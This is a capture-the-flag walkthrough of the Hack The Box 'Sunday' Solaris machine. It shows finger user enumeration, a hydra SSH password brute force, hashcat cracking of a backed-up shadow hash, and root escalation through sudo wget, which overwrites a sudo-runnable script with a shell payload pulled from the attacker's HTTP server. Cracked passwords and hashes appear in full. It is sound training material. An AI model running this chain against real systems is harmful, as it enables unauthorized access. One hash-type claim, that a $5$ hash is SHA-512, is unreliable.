#HackTheBox Sunday

Full TCP Nmap Scan

nmap -p-
Nmap scan report for
Host is up (0.035s latency).
Not shown: 63933 filtered ports, 1598 closed ports
79/tcp    open  finger
111/tcp   open  rpcbind
22022/tcp open  unknown
55029/tcp open  unknown
nmap -p 79,111,22022,55029 -sV -oA full-scan-scripts
Nmap scan report for
Host is up (0.037s latency).
79/tcp    open  finger  Sun Solaris fingerd
|_finger: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
55029/tcp open  unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Thoughts Based On Full TCP Nmap Scan

Looking at the ports, there are really three that are of interest: 79 - Finger, 111 - RPCBind, and 22022 - SunSSH 1.3. Firstly, 79 - Finger is a program you can use to find information about computer users. Typically this will lists full names login names, and possibly other details. This can be things like phone numbers, office locations. login tine, idle time, etc. We can enumerate users by using finger and using a tool such as finger-user-enum.pl which can be found from pentestermonkey. This tool essentially asks for a list of possible usernames and then attempts to find if these usernames are valid. Next is 111 - RPCBind. Port 111 is known to be Portmapper which just provides information between Unix based systems. Typically when you probe this port, it can give you information about the Unix OS, and services that are being ran. This is probably the second port I will be looking at after 79 - Finger. Lastly, there is 22022 - SunSSH 1.3. As always, SSH is a vector I go to after I find at least a username or if I find a valid username and password as well. Since the only port that would lead me to get a username would most likely be 79 - Finger, I will be going for that first to see if I can get any possible usernames and then see if I can just brute force a user account and gain access through SSH. With that being said, let’s start this box!

79 - Finger | Enumeration

As I said above on my thoughts, Finger can be used to go and enumerate users using the tool finger-user-enum.pl. You can get a direct download to finger-user-enum.pl here. After you download it, all you have to do is navigate to the directory and then you can run the tool. To download the file you can run the following commands:

wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
tar -xvf finger-user-enum-1.0.tar.gz

This will download the file to your current directory you are in and then extract it. Go ahead and change directories into the finger-user-enum folder and you will see the finger-user-enum.pl file. To run it all you need to do is the following:

./finger-user-enum.pl -U <word_list> -t <target_ip_addr>

I used the names.txt wordlists from Seclists against the target which simply has around 10,000 common usernames. This is what my command looked like:

./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t
root@kali-[/opt/finger-user-enum]./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

|                   Scan Information                       |

Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Fri May 28 21:13:22 2021 #########
access@ access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@ Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@ Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@ bin             ???                         < .  .  .  . >..
dee dee@ Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@ Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@ Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@ Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@ Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@ Login       Name               TTY         Idle    When    Where..miof                  ???..mela                  ???..
root@ root     Super-User            pts/3        <Apr 24, 2018> sunday              ..
sammy@ sammy                 console      <Apr 24, 2018>..
sunny@ sunny                 pts/3        <Apr 24, 2018>          ..
sys@ sys             ???                         < .  .  .  . >..
zsa zsa@ Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Fri May  28 21:49:09 2021 #########
15 results.

10177 queries in 2147 seconds (4.7 queries / sec)

We see that we have a few users that are of interest. The one’s with pts/3 or console are of the most interest. This is because it seems that they have actually logged in recently which means they are valid user accounts most likely. Now that I have valid usernames, I am going to run hydra which is a tool used to brute force logins. Essentially it will be taking the username sunny and sammy and be testing it against a list of passwords I provide it. The password list I will be using is probable-v2-top1575.txt. The only reason I used this and not rockyou.txt is because of time. To use hydra and perform a brute force against the user sunny, we can use the following command:

hydra -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt ssh -s 22022  
root@kali-[~]hydra -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt ssh -s 22022                                                                                                              [0/124]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).                             

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-28 21:51:25                                                                                                                                                          
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4                                                                                                                       
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore                                                                              
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1575 login tries (l:1/p:1575), ~99 tries per task
[DATA] attacking ssh://
[STATUS] 217.00 tries/min, 217 tries in 00:01h, 1367 to do in 00:07h, 16 active                                                                                                                                                             
[STATUS] 159.00 tries/min, 477 tries in 00:03h, 1110 to do in 00:07h, 16 active                                       
[ERROR] ssh target does not support password auth                                                                                                                                                                                           
[22022][ssh] host:   login: sunny   password: sunday                                                      
1 of 1 target successfully completed, 1 valid password found                                                          
[WARNING] Writing restore file because 12 final worker threads did not complete until end.                            
[ERROR] 12 targets did not resolve or could not be connected                  
[ERROR] 0 target did not complete                                                                                     
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-28 21:57:51

And we can see the following output:

[22022][ssh] host:   login: sunny   password: sunday 

So the username is sunny and the password is sunday. Let’s try to ssh in!

root@kali-[~]ssh sunny@ -p 22022
Unable to negotiate with port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

And we get an error: “Unable to negotiate with port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1.” This happens because the client and server were unable to agree on the key exchange algorithm most likely because the key exchange algorithms available on this host are legacy. There is a way to force OpenSSH to enable a certain key exchange algorithm so that we can connect to this host with the KexAlgorithms option. Using this option and providing the key we want to use will enable that key exchange algorithm for us to use.

root@kali-[~]ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@ -p 22022
Last login: Tue Apr 24 10:48:11 2018 from
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008

And we are logged in! I’m going to try sudo -l which lists what commands I can run as sudo which can possibly escalate our privileges to the root user.

sudo -l
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

Okay so we can run the file troll under the directory /root/. Interesting… Let’s see what this is doing by running it.

sudo /root/./troll
sunny@sunday:~$ sudo /root/./troll
uid=0(root) gid=0(root)

Looks like it is just echoing out “testing” and then using the id command to show the user ID and the group ID of the user. It is showing us the root user because we ran this with sudo. So that’s interesting but it won’t really do us any good because the file can only be edited as the root user. I manually was looking around and found in the root of the file system a directory backup. This isn’t a normal directory that is in Unix systems so I went ahead and looked in it.

sunny@sunday:/$ ls
backup  bin  boot  cdrom  dev  devices  etc  export  home  kernel  lib  lost+found  media  mnt  net  opt  platform  proc  root  rpool  sbin  system  tmp  usr  var
sunny@sunday:/$ ls -la backup/
total 5
drwxr-xr-x  2 root root   4 2018-04-15 20:44 .
drwxr-xr-x 26 root root  27 2020-07-31 17:59 ..
-r-x--x--x  1 root root  53 2018-04-24 10:35 agent22.backup
-rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup

There is a shadow.backup file that I can read. If you do not know what shadow is. Under the /etc/ directory is a file named shadow. The shadow file is where actual passwords are stored (in a hashed format) for user accounts. So since we can see the hash value of user accounts, we could possibly go and crack the hash using a tool like hashcat which will try to crack hashes given a hash and a list of possible passwords. So we can see we have two hashes: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: and sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::. The sunny hash won’t do us any good because we already have the password. Let’s look into the sammy user account. The hash is only from the first $ sign to the last :. So the hash would look like this: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB.

sunny@sunday:/$ cat backup/shadow.backup 

Let’s go back onto our host and put this hash into a file. You can use something like nano or vim or whatever text editor you would like to use and just paste that hash in there and name it something like hash. Now that we have that all we need to do is use hashcat, specify what type of hash this is, (SHA-512), the path to the hash (mine is in my current directory so I just write hash without a path), and the path to your wordlist (I went ahead and use rockyou.txt for this one which is a great wordlist to use to crack hashes). To identify the hash as SHA-512, you can look here which has a list of “Hash Modes” that hashcat can choose from. They show examples of what these hashes would look like and I simply looked for the hash that started with $5$ and found that the mode is 7400. So I went ahead and used the following command to crack the hash:

hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt    
hashcat (v5.1.0) starting...                                                                                          
OpenCL Platform #1: NVIDIA Corporation                                                                                
* Device #1: GeForce GTX 1080 Ti, 2792/11170 MB allocatable, 28MCU                                                    
* Device #2: GeForce GTX 1080 Ti, 2794/11178 MB allocatable, 28MCU                                                    
OpenCL Platform #2: The pocl project
* Device #3: pthread-AMD Ryzen 3 1200 Quad-Core Processor, skipped.

OpenCL Platform #3: Intel(R) Corporation
* Device #4: AMD Ryzen 3 1200 Quad-Core Processor, skipped. 

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Dictionary cache hit:                                                                                                 
* Filename..: rockyou.txt                                                                                             
* Passwords.: 14344384                                                                                                
* Bytes.....: 139921497                                                                                               
* Keyspace..: 14344384                                                                                                
Session..........: hashcat                                                                                                                                                                                                                  
Status...........: Cracked                                                                                                                                                                                                                  
Hash.Type........: sha256crypt $5$, SHA256 (Unix)                                                                     
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB                                     
Time.Started.....: Fri Jul  2 17:17:10 2021 (2 secs)                                                                  
Time.Estimated...: Fri Jul  2 17:17:12 2021 (0 secs)                                                                  
Guess.Base.......: File (rockyou.txt)                                                                                 
Guess.Queue......: 1/1 (100.00%)                                                                                      
Speed.#1.........:    89350 H/s (8.03ms) @ Accel:64 Loops:32 Thr:64 Vec:1                                             
Speed.#2.........:    89006 H/s (8.08ms) @ Accel:64 Loops:32 Thr:64 Vec:1                                                                                                                                                                   
Speed.#*.........:   178.4 kH/s                                                                                                                                                                                                             
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts                                                         
Progress.........: 229376/14344384 (1.60%)                 
Rejected.........: 0/229376 (0.00%)                       
Restore.Point....: 0/14344384 (0.00%)                                                                                 
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000                 
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:4992-5000                                                           
Candidates.#1....: 123456 -> 022580                                                                                   
Candidates.#2....: 022579 -> 170176                                                                                   
Hardware.Mon.#1..: Temp: 38c Fan: 23% Util:100% Core:1885MHz Mem:5005MHz Bus:8                                        
Hardware.Mon.#2..: Temp: 31c Fan: 22% Util:100% Core:1898MHz Mem:5005MHz Bus:8                                        
Started: Fri Jul  2 17:16:56 2021                                                                                     
Stopped: Fri Jul  2 17:17:12 2021

And we see we cracked the hash. It shows the following output: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude! . So the password to the user sammy is cooldude! Let’s log into sammy’s account.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sammy@ -p 22022
root@kali-[~]ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sammy@ -p 22022
Last login: Fri Jul 31 17:59:59 2020
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008

I go ahead and run sudo -l again to lists the commands I can run as the sammy user with sudo privileges.

sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

So we can use wget as the user sammy. Wget is a free utility for non-interactive download of files from the Web. So we can download files using wget with sudo privileges. This essentially means we can overwrite files from anywhere. So let’s recall what information we have so far. We have the user sunny can run the file /root/troll with sudo privileges, and the user sammy can use wget with sudo privileges, meaning I can overwrite any files. So what if we overwrite the troll file and have it spawn a shell? Firstly let’s check the path for bash so we can use a shebang at the beginning of the script so the program loader is instructed to run the program in the correct bash path.

sammy@sunday:~$ which bash

So bash is in /usr/bin/bash. Now I’m going to go back to my host and create a simple file named troll. Just use a text editor like vim, nano, gedit, etc. whatever floats your boat. With your text editor opened, put the following within the troll file:



All this is doing is directing the program loader to use /usr/bin/bash and then run the command bash which will spawn a bash shell. Whatever user we are using when typing in bash will be the user the shell will spawn as. So if we run it with sudo this is going to be running it with root permissions, meaning we will be spawning a shell with as the root user. Now that we have the file all done, let’s set up a simple HTTP server using Python. This HTTP server will be on our host simply hosting the directory we are currently in (the directory we just made the troll file in).

python -m SimpleHTTPServer 80

Now go back to the sammy account and use wget to download the file and we can use the -O flag which will output the file into a specific path. The path I chose was /root/troll so it will overwrite the original troll file.

sammy@sunday:~$ sudo wget -O /root/troll
           => `/root/troll'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 23 [application/octet-stream]

100%[================================================================================================================================================================================================>] 23            --.--K/s             

23:05:57 (4.41 MB/s) - `/root/troll' saved [23/23]

Now quickly as the sunny user run sudo /root/troll right after you just overwrote the file and you should get root.

sunny@sunday:~$ sudo /root/troll
root@sunday:~# whoami && id
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)

Make sure you run it ASAP after you overwrite it because there is a script that the creator implemented to ensure that the troll file reverts back to its original form. If you overwrite it and then run sudo /root/troll as the sunny user too late, you most likely won’t get the shell because the file went back to its original form.